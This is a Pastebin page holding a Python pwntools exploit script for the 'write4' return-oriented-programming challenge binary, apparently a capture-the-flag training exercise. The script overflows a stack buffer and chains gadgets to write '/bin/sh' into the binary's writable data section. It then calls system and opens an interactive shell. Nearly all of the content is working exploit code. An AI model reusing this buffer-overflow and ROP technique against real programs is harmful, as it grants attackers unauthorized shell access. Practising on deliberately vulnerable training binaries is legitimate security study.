Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- from pwn import *
- context(arch = 'amd64', os = 'linux')
- elf = ELF("./write4")
- p = process(elf.path)
- #p = gdb.debug("/home/manu/Challenges/write4", '''
- #break main
- #''')
- # 0x00400820 4d893e mov qword [r14], r15
- # 0x00400823 c3 ret
- # 0x00400890 415e pop r14
- # 0x00400892 415f pop r15
- # 0x00400894 c3 ret
- # 0x00400893 5f pop rdi
- # 0x00400894 c3 ret
- # [25] .data PROGBITS 0000000000601050 00001050
- # 0000000000000010 0000000000000000 WA 0 0 8
- pop_rdi_ret = 0x00400893
- mov_r14_r15 = 0x00400820
- pop14_pop15_ret = 0x00400890
- system = 0x4005e0
- bin_sh = "/bin/sh\x00"
- data_section_writable = 0x601050
- p.sendline("A"*40 + p64(pop14_pop15_ret) + p64(data_section_writable) + bin_sh + p64(mov_r14_r15) + p64(pop_rdi_ret) + p64(data_section_writable) + p64(system))
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement